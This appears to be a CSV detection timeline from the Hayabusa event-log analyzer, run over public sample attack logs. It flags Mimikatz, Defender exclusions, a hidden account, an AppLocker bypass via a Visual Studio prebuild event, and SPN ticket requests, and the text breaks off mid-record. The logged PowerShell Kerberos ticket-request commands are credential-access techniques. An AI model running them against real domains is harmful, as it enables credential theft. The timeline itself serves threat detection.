2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimikatz.exe | Process: 
C:\Windows\explorer.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx 2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx 2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx 2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimikatz.exe | Process: C:\Windows\explorer.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx 2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx 2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:50007 (MSEDGEWIN10) | Dst: 10.0.2.17:135 (MSEDGEWIN10CLONE) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 6976 | PGUID: 747F3D96-CF4B-5FD8-0000-00101AD58700,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx 2020-12-16 00:00:15.695 
+09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx 2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:50008 (MSEDGEWIN10) | Dst: 10.0.2.17:49666 (MSEDGEWIN10CLONE) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 6976 | PGUID: 747F3D96-CF4B-5FD8-0000-00101AD58700,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx 2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx 2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx 2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx 2020-12-17 19:38:33.951 +09:00,jump01.offsec.lan,7045,info,Persis,Service Installed,Name: WCESERVICE | Path: D:\Service\test.exe | Account: LocalSystem | Start Type: demand 
start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx 2020-12-19 02:56:07.017 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Hidden Local Account Created | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\hideme0007$\(Default): Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 648 | PGUID: 747F3D96-68DD-5FDD-0000-00101B660000,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_hidden_local_account_sysmon.evtx 2021-01-26 22:21:13.237 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\~DF0187A90594A6AC9B.TMP | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:13.558 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\NuGetScratch\lock\b8162606fcd2bea192a83c85aaff3292f908cfde | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:13.560 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\NuGetScratch\lock\3eaea9d73c9b6f131ef5b5e8a4cf9a7567b32fa3 | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 
00247C92-172A-6010-0000-00103C3DD02E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:13.561 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\NuGetScratch\lock\3eaea9d73c9b6f131ef5b5e8a4cf9a7567b32fa3 | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:13.683 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.log | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe"" ""C:\Users\bouss\source\repos\blabla\blabla.sln"" | LID: 0x26f746a2 | PID: 2988 | PGUID: 
00247C92-1749-6010-0000-0010348FD92E",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:13.972 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\blabla.lastbuildstate | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:13.975 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:13.975 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:13.978 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | Process: C:\Windows\SysWOW64\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\Program Files (x86)\Microsoft Visual 
Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false | LID: 0x26f746a2 | PID: 23168 | PGUID: 00247C92-1749-6010-0000-0010EFAAD92E",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: powershell.exe start-process notepad.exe | Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | LID: 0x26f746a2 | PID: 18548 | PGUID: 00247C92-174A-6010-0000-0010C0B2D92E",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.296 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\SysWOW64\notepad.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: powershell.exe start-process notepad.exe | LID: 0x26f746a2 | PID: 28276 | PGUID: 00247C92-174A-6010-0000-001042DDD92E",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.399 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.command.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 
00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.425 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.425 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.425 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.425 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 
00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.428 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp"" | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false | LID: 0x26f746a2 | PID: 18188 | PGUID: 00247C92-174A-6010-0000-0010DCFFD92E",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.456 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\cl.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp"" | 
LID: 0x26f746a2 | PID: 11676 | PGUID: 00247C92-174A-6010-0000-0010A20ADA2E",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.667 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\VCTIP.EXE"" | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\vctip.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | LID: 0x26f746a2 | PID: 11636 | PGUID: 00247C92-174A-6010-0000-0010FF10DA2E",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.871 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.write.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.871 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.write.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 
00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.871 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.read.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.872 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.read.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.872 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.command.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:23.229 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Microsoft\VSApplicationInsights\vstelAIF-312cbd79-9dbb-4c48-a7da-3cc2a931cb70\20210126132123_277b7688d03b431eb925a7d64307d79a.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 
00247C92-172A-6010-0000-00103C3DD02E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:23.303 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Microsoft\VSApplicationInsights\vstelAIF-312cbd79-9dbb-4c48-a7da-3cc2a931cb70\20210126132123_dd350a9897114eee834fb0993b4dee7e.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:23.305 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Microsoft\VSApplicationInsights\vstelf144292e-e3b2-4011-ac90-20e5c03fbce5\20210126132123_195f3c1acef04eaeb6f67d3ff46e5958.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:33.197 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\Downloads\prebuildevent_visual_studio.evtx | Process: C:\windows\system32\mmc.exe | PID: 22932 | PGUID: 00247C92-EC0A-600F-0000-00100AEFCC2C,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-30 18:13:13.309 +09:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,$SPNName = 
'MSSQLSvc/Svc-SQL-DB01.offsec.lan',../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx 2021-01-30 18:13:13.309 +09:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx 2021-01-30 18:13:13.309 +09:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,Add-Type -AssemblyNAme System.IdentityModel,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx 2021-01-30 18:13:13.309 +09:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx 2021-01-30 18:13:13.309 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx 2021-01-30 18:13:13.309 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Add-Type): ""Add-Type"" ParameterBinding(Add-Type): name=""AssemblyName""; 
value=""System.IdentityModel""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx 2021-01-30 18:13:13.309 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx 2021-01-30 18:13:17.546 +09:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $SPNName,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx 2021-01-30 18:13:17.546 +09:00,fs02.offsec.lan,4104,high,CredAccess,Request A Single Ticket via PowerShell,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx 2021-01-30 18:13:17.561 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""ArgumentList""; value=""MSSQLSvc/Svc-SQL-DB01.offsec.lan"" ParameterBinding(New-Object): name=""TypeName""; value=""System.IdentityModel.Tokens.KerberosRequestorSecurityToken"" TerminatingError(New-Object): ""Exception calling "".ctor"" with ""1"" argument(s): ""The NetworkCredentials provided were unable to create a Kerberos credential, see inner exception for 
